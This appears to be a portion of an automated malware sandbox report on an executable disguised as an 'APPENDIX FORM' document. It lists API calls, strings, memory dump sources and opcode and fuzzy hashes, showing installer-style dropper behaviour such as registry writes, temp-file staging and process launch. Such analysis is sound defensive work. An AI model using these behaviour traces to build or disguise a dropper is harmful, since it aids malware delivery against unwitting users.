  • Part of subcall function 004031CE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA6,?), ref: 004031DC
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD,000000FF,00000000,00000000), ref: 00403084
• WriteFile.KERNELBASE(0040A888,0040F981,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?), ref: 0040313E
• SetFilePointer.KERNELBASE(002A0792,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD), ref: 00403190
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$Pointer$CountTickWrite
• String ID: 3h)
• API String ID: 2146148272-922417944
• Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
• Instruction ID: a35b4d635d582a079554899d3f3348b8a37966e1b02de07338691533ba46218a
• Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
• Instruction Fuzzy Hash: 8B41BF729042019FDB10AF29ED849663FFCE748356715823BE914BB2E0C7399E41DB5E

Control-flow Graph of the function at 40231e
APIs
• RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235C
• lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237C
• RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B5
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID: C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp
• API String ID: 1356686001-3973415816
• Opcode ID: 8883ba43675c8a8238c8498911ba25d19e3cba87ffe1608babd6e0b8c8001e09
• Instruction ID: 5b7358e468b3e7e805740e69444adcde94b22edecb5190afa3496e3dc7040632
• Opcode Fuzzy Hash: 8883ba43675c8a8238c8498911ba25d19e3cba87ffe1608babd6e0b8c8001e09
• Instruction Fuzzy Hash: AD1181B1A00118BEEB10EBA4DE89EAF7678EB50358F10413AF905B61D1D6B85D01A628

Control-flow Graph of the function at 4015b3
APIs
  • Part of subcall function 00405809: CharNextA.USER32(?,?,luggages.con,?,00405875,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405817
  • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 0040581C
  • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 00405830
• CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
• GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
• GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
• SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,00000000,00000000,000000F0), ref: 00401622
Strings
• C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen, xrefs: 00401617
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
• String ID: C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen
• API String ID: 3751793516-3057813021
• Opcode ID: ce076ba71617989824715641df4ef62626dac5c5f685b9f75a0ffb99cabb616d
• Instruction ID: a7fcd4b568d892c9356fe073e55a2dcd02e69eb8fb6dd9dcb191d2df0a387b75
• Opcode Fuzzy Hash: ce076ba71617989824715641df4ef62626dac5c5f685b9f75a0ffb99cabb616d
• Instruction Fuzzy Hash: BB112532908150ABDB117FB51D4496F27B0EA52366728473FF491B22E2D23C0942D62E

Control-flow Graph of the function at 4059a0
APIs
• GetTickCount.KERNEL32 ref: 004059B4
• GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CE
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059A3, 004059A7
• nsa, xrefs: 004059AB
• "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 004059A0
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
• API String ID: 1716503409-1641334762
• Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
• Instruction ID: 39b4e1e9eedef81f1669a342cc471fdfd7c96e097019c4c4e899424100dca803
• Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
• Instruction Fuzzy Hash: 86F08976748204ABD7104F56DC05BDB7B99DF91760F108037F904DA180D5B499548765

Control-flow Graph of the function at 402a3f
APIs
• RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A60
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
• RegCloseKey.ADVAPI32(?), ref: 00402AA5
• RegCloseKey.ADVAPI32(?), ref: 00402ACA
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2173a1222272c8fea1f402388a10c978ca0a8ff75f5850e8d405ccc6749e7504
• Instruction ID: a214132de7a877a1f887ec7b259b79ce535b7ac4ce934fbe7a8c52476c4c5b6f
• Opcode Fuzzy Hash: 2173a1222272c8fea1f402388a10c978ca0a8ff75f5850e8d405ccc6749e7504
• Instruction Fuzzy Hash: A8116D71A00108BFDF219F90DE49EAB7B79EB54349F104176F906A00A0D7B49E51AF59

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
APIs
  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CED
  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF2
  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF7
• GlobalFree.KERNEL32(00000000), ref: 10001785
• FreeLibrary.KERNEL32(?), ref: 100017FC
• GlobalFree.KERNEL32(00000000), ref: 10001821
  • Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200
  • Part of subcall function 100025A9: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 1000261B
  • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
  • Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243B
  • Part of subcall function 100023D6: GlobalFree.KERNEL32(?), ref: 100024F7
  • Part of subcall function 100023D6: GlobalFree.KERNEL32(00000000), ref: 10002520
Strings
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$Free$Alloc$Librarylstrcpywsprintf
• String ID:
• API String ID: 1767494692-3916222277
• Opcode ID: 8f546bcdbccf52204e4abd016d6570bc89ddc6d917656edff521bb3708f9dae6
• Instruction ID: 31c192df4af0f094e7bae8beab1b8a4839dd106043f43e412ae8e076eabbacf1
• Opcode Fuzzy Hash: 8f546bcdbccf52204e4abd016d6570bc89ddc6d917656edff521bb3708f9dae6
• Instruction Fuzzy Hash: 3431AE758046059AFB41DF749CC6BDA37ECFF052D0F108425F909AA09EDFB499858BA0

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
APIs
• SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
• SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: bf1d3e3dad9acb3115c08623f9690363476153f89cea488026e82bb3f758518a
• Instruction ID: 32dbfdbc90181073e3716ad927fe4118a64655002d51add2ca0d79efa18d1667
• Opcode Fuzzy Hash: bf1d3e3dad9acb3115c08623f9690363476153f89cea488026e82bb3f758518a
• Instruction Fuzzy Hash: B02181B1A44208BEEF45AFB4CD4AAAE7AB5EB40304F14457AF541B61D1D6B88940DB18
APIs
  • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,Centraleuropisk Setup,NSIS Error), ref: 00405CED
  • Part of subcall function 00405809: CharNextA.USER32(?,?,luggages.con,?,00405875,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405817
  • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 0040581C
  • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 00405830
• lstrlenA.KERNEL32(luggages.con,00000000,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 004058B1
• GetFileAttributesA.KERNELBASE(luggages.con,luggages.con,luggages.con,luggages.con,luggages.con,luggages.con,00000000,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 004058C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: luggages.con
• API String ID: 3248276644-617196232
• Opcode ID: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
• Instruction ID: 2ece47ccb26b0c22bb62944128bc782dcc9e5394e0a4c06150887c330ad7e386
• Opcode Fuzzy Hash: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
• Instruction Fuzzy Hash: D5F02823105D6122D62232371C49E9F2A45CD83314718813BFC60B22D2DA3CC863DD7E
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B8
• CloseHandle.KERNEL32(?), ref: 004054C5
Strings
• Error launching installer, xrefs: 004054A6
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
• Instruction ID: 7b633475fa2e13aa519e78ab65903730338a863422e7bcfa27920a6c3387955a
• Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
• Instruction Fuzzy Hash: 55E0E674A00209ABDB10EFA4DD4596B7BBDEB10305B408531B914E2160D774D410CA79
APIs
  • Part of subcall function 00405F4B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FA3
  • Part of subcall function 00405F4B: CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
  • Part of subcall function 00405F4B: CharNextA.USER32(?,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FB5
  • Part of subcall function 00405F4B: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FC5
• CreateDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00403206
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
• API String ID: 4115351271-3049706366
• Opcode ID: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
• Instruction ID: 1d184d1ad875a5c971663b26bd465f741c1c583330f8faa726a1fd3199eebd18
• Opcode Fuzzy Hash: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
• Instruction Fuzzy Hash: EED0922160AD3062D551362A7C0AFCF190C8F4636AF918077F804B50C65A6C6A8269FF
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
                                                                                                              • Instruction ID: 57e40c2acefb0b34dc51ba14adea8f2dd467a51599ed72ebaeee0bf9bad7d858
                                                                                                              • Opcode Fuzzy Hash: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
                                                                                                              • Instruction Fuzzy Hash: 9AA14171E00229CFDB28CFA8C8547ADBBB1FB44305F15816ED816BB281D7785A96DF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
                                                                                                              • Instruction ID: 43f12e2563a4047fa425a185cdd3bc30ce3cfc84c0a70b15e8e3771f47715ab2
                                                                                                              • Opcode Fuzzy Hash: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
                                                                                                              • Instruction Fuzzy Hash: C3913070E00229CFDF28CF98C8547ADBBB1FB44305F15816AD816BB281D778AA96DF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
                                                                                                              • Instruction ID: 8348384c2088d0dca10fb2cfce14f15a8a06df42cb65cfce77c7d545600b327b
                                                                                                              • Opcode Fuzzy Hash: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
                                                                                                              • Instruction Fuzzy Hash: 2F813771D04228CFDF24DFA8C8847ADBBB1FB45305F25816AD416BB281C7789996DF04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
                                                                                                              • Instruction ID: b0014496198728110a5296264d01e6ecaf8aeebecb777455980bb60694c24f35
                                                                                                              • Opcode Fuzzy Hash: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
                                                                                                              • Instruction Fuzzy Hash: B5818771D00228CFDF24DFA8C8447ADBBB1FB44301F11816AD956BB281C7786A96DF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
                                                                                                              • Instruction ID: ae8010f5f00a2a00aaab6ae45f29b4f91a62fe5ecd20e2395cd8f48d9039e886
                                                                                                              • Opcode Fuzzy Hash: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
                                                                                                              • Instruction Fuzzy Hash: 54711471E00229CFDF24DF98C8547ADBBB1FB44305F15806AD816BB281D7389996DF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
                                                                                                              • Instruction ID: 6e96038cb0222d47830e4b58fd7c52cae377976e6dc55ad69c20d6e03a859a59
                                                                                                              • Opcode Fuzzy Hash: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
                                                                                                              • Instruction Fuzzy Hash: 0A712371E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D7789A96DF44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
                                                                                                              • Instruction ID: e293682df0fe9d8d1d8f36ea8a561890eb7f7220d29e3ea09188f27b28daafc9
                                                                                                              • Opcode Fuzzy Hash: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
                                                                                                              • Instruction Fuzzy Hash: 3A713471E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D778AA96DF44
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECD,000000FF,00000000,00000000,00409130,?), ref: 00402F47
                                                                                                              • WriteFile.KERNELBASE(00000000,00412888,?,000000FF,00000000,00412888,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
